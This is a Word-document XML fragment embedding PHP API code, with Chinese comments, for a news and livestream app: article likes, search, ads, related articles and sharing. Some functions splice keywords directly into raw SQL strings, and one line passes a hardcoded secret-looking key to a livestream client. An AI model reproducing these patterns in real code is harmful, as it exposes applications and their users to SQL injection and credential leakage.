        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38C5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username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EC4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qianming </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞用户签名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236D21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A801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失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44516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0E98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FA6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anList() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36206F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ost.pages/d', 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1551E5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 input('param.pingId/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E64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pages' =&gt; 'number', 'pingId' =&gt; 'number|require', ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A31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pages' =&gt; $pages, 'pingId' =&gt; $pingId, ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCAA4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C1CB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506F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48963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64F8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AC89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2CE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Id'] = $pingId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BB69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_zan')-&gt;where($where)-&gt;order('time', 'desc')-&gt;field('uid')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDCB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452C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48018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7D445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42563E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qianming'] = $user['qianming'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A348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130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5B5D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A38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ot_words() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B1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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7626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reg_match("/var BD_DATA=([\s\S]*?)}];/", $html, $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB14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032AEF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ata['1'] . '}]';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212F9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json_decode($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B7AE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A2D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40690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19196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3714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F15E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4582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earch() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA3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input('post.text', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1CE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text' =&gt; 'require', ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE44A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text' =&gt; $text, ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701D2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29502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966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0223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CE102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26AB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A12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gt;limit(5)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BE57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F3424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5FEC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est() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FAA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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A450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iconv("gb2312", "utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C18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lt;span class='n2'&gt;(.*?)&lt;\/span&gt;/", $data, $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0381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content[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249D3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EF0C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edia() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B901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nput('limit/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5274D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limit) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6727A0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10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7632D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7E8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0FC8C0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lt;&gt;', 0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23845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Num'] = ['&lt;&gt;', 0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27806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lick'] = ['&lt;&gt;', 0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047A55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date('Y-m-d', strtotime("-2 day"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64208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pdate_time'] = ['&gt;= time', $time];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0CD2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gt;field('id,title,uid,update_time')-&gt;where($where)-&gt;limit($limit)-&gt;order('rand()')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ED41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5DE817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uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BECC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36170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id'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB2D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img'] = $user['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D370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username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6794B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5F9E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pdate_time'] = date('m-d H:i', $v['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45485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k]['create_time'] = date('m-d H:i', $v['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CF0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rl'] = url('index/article/view', ['id' =&gt; $v['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37888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EB6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CD4F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543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hannel() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D75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 = input('typeid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E70D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nput('limit/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9ED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limit) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFEA6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10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D3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522E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6CC6E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gt;field('id,img,mobile,nickname')-&gt;where($where)-&gt;limit($limit)-&gt;order('rand()')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BE5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6FFB00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nickname']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4011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name'] = $v['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F137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v['mobile']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DFF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mobile'] = $v['mobile'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763122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B0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mobile'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BA9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nickname'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104675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g']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2740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img'] = '/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED692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BEE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13A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0AC2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C721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lide() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4C7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slide')-&gt;where(['tid' =&gt; 1])-&gt;order('des desc, id desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD21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27C97E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Img[$k] = _imgUrl() . $v['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7816E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Text[$k] = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EBA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Url[$k]['url'] = $v['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684D2E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lideUrl[$k]['title'] = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7404EF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598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slide' =&gt; $slideImg, 'typeid' =&gt; $slideUrl, 'title' =&gt; $slideText]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABA0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F270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d() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD6D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 ['ad'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C435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hide'] == 0 || !$config['hide']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFBF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59C9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7C3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00831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3F1EB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fig['order'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DD1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ppad')-&gt;where($where)-&gt;order('rand()')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744030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8D51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11845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lt;', $id];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01F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order = 'id desc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C60D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AD3C3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rder = 'id desc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690C9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DAA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ppad')-&gt;where($where)-&gt;order($order)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A30FA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03FD17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ppad')-&gt;where(['hide' =&gt; 1])-&gt;order($order)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F720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773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1B3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config' =&gt; $config, 'data' =&gt; $data]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA2E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DF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DF95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Deprecated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C64E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441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clickAjax </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯增加访问次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FAB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资讯增加访问次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1398F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6F9B64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77E6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6BEE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d </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FB6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652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200) {String} ret </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F3A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EA46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lickAjax() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379D39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25A8B6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aid' =&gt; 'number|require', ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54738C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aid' =&gt; $id];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD7F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4B568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2D2F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038A6F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70D57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DDD7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9D10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01889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gt; $id, 'hide' =&gt; 1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709BB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click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211AE9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0749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操作成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F3D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637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14A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xiangguan(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01833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aid/d');  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231F44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id) exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01898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Data = Db::name('article')-&gt;find($aid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E4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idData['title']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D2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12D1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1A8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id) exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45823E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aidData['keywords'] ? $aidData['keywords'] : $aidData['tags'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B34C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697B5F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nput('limit/d', '6');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1649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key){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0BE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explode(',',$key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F4D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key as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5316AE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0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282EC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keywords` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D44B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 "`tags` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F66B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title` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CBA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 "`description` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F42B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45C3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 or `keywords` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715758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gs .= " or `tags` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFD57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 or `title` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181553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 " or `description` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05306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0DD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98AA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and (". $keywords ." or ". $tags ." or ". $title ." or ". $description .")";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD20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535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idData['mychannel'] == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FC3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 and `video` &lt;&gt; '' ".$keywords;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB0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87E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Db::Query("SELECT id,title,description,mychannel,image,update_time,source,pingNum,images,videodate,uid,click,weitoutiao,zan,video,qiniu_video_type,content FROM `fx_article` WHERE  `mychannel` = '$aidData[mychannel]' and `id`!='$aid' ".$keywords." order by rand() desc limit $limit");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52784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key as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C150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3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0AF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image']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EF10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mage'] =  '/' . $v['video'] . '?vframe/jpg/offset/2/w/300/h/200';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196243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C591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k]['image'] = _imgUrl() . $v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6E6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k]['video'] = _imgUrl() . $v['video'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36742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887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07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key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE443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F1BF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hibo(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123989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zhibo')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4453D1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roomName,uid,userPwd as password,roomId,type_id,img_l,img_r')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA6F5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update_time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4617F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC39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2D9BC0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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B394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6F5D8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71420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username']   =   $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7066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img']        =   $user['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1ED6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fensi']=Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D6C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v['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C13C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DADF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k] = $v['roomId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753AC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158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count($data['data'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E8C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hibo = new \app\api\controller\Zhibo("9yQq4VED0hTIIcby4wP9fJeqtvkfZRUm2VbWwrSJlYxDbfUow2qAW+ti/5t1eyA/KIsGaqCoytt/");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1742C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json_decode($zhibo-&gt;GetRoomsLiveInfo($ids),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E87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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E55D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list['ret'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2D8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list['ret']['entities'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67836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list as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF7F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roomId'] = $v['roomId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC3C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streamStatus'] = $v['streamStatus'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7421A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_data[$k]['playUserCount'] = $v['playUserCount'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497BF0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B99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FE0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3DDB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list_data as $k_s =&gt; $v_s) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5D0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roomId'] == $v_s['roomId']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5920DE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streamStatus']   = $v_s['streamStatus'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFD2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layUserCount']  = $v_s['playUserCount'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E62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52E341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657F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D5B6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BC1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114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017F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1CF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601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article/related </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相关资讯文章列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E55F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相关资讯文章列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23422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3B3C0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883B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BAF9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03058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limit       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>记录条数（非必填，默认值：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0530D0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相关资讯文章列表（至多</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBAC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D0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lated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B44D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1E6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0A94E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nput('param.limit', 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB5F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18A91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AD70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6175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7EAA9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761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1A3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210E9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47A36C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393A5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323C9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article['keywords'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59932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keywords == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4A6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article['tags'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E691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9FD6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keywords != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE1F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s = explode(',', $keywords);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E155D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d_articles = Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A92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lt;&gt;', $article_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7876C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7EE0A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_query = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B722F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_conditions = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36884B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keywords as $keyword) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C84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_conditions[] = '(keywords LIKE "%' . $keyword . '%" OR title LIKE "%' . $keyword . '%" OR tags LIKE "%' . $keyword . '%")';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5D99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650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where_conditions) == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1716E6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_query = $where_conditions[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648433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EC4FA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_query = '(' . implode(' OR ', $where_conditions) . ')';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D81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1587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d_articles = $related_articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FF3C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here_query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C06D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42429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limit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA2A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10BDC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related_articles) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B11C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related_articles as $key =&gt; $related_article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547CE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d_articles[$key]['username'] = 'Anonymous';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567EA1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530462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related_article['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4CBB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CCA00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 &amp;&amp; $member['nickname']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8D57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d_articles[$key]['username'] = $member['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2553F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empty($member) &amp;&amp; $member['user']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2266B8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lated_articles[$key]['username'] = $member['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B01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6E54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ACB0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0E5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lated_articles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67543C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5AA2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454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未设置关键字或标签</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA192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6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008978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D7D9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B022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5F6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4AE50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1E4451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3E091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439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7EB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721B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        {post} /api/article/share </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A24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分享资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1327A3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72C1B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DD43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2191E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分享成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745ED5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分享失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752C0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35198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FCF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hare()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633DA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4D7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BE231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0F808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02BE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E8B83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分享资讯文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09521E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2E5C8B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6CF1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7C5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1A6237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44F5C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2FBA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2ACC3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6D35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88E1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252CB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2D5C9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53F70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46B90A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3C5F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1C3F8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4B4C3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45AB7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5E316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share_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFED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3440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分享成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E95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568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769E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4375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49BE99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3003F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475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066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E46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2D7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65D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zan </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞｜取消点赞资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A92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资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D82C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6C401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0DC0A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token       Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486E4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05E9DA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77802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0B608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10F4A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148F1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893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an()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D049E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376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8E76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065E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51670D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9808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314E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资讯文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC4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40BAA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9FAE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F42B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7C45D4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1E009A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827A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43347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0064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3E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EAB1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74B67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1691B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6EB49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02A29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0C84F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article_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63645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_uid'] = $article['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8AF4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zan = Db::name('article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CAF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1B22F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85CD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_zan)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C17D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zan['zan'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D13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zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E525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17D97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C05E7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597BD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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE173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07224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76D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1329AD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4100D8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587B8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157DE2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article['zan'] - 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19723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article['cai'] + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E3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367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资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2E13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 '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A0D8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6AD7F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68F07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6C77EA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149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81AC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zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47885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537E29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2A19C9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3A662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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEC4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1014DE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9C0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7B372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0F09B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0211B3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7C160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article['zan'] + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7399C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article['cai'] - 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2288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E479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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3816F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 '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636D9C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F1DC2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33CE7E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13DA3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859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8D6F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404A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22AC3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i'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43005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7EE0C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zan_id = Db::name('article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E11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4F6A62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zan_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F579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1F2B03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50339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6591F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CABC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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505C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 '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA62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30663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172E8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6EBFF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0E85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369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DC2D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DC31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4D6899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40CBE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68C5AF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DA13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C7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2B72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CD37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57D55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DB2F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D78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30D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F334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 </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
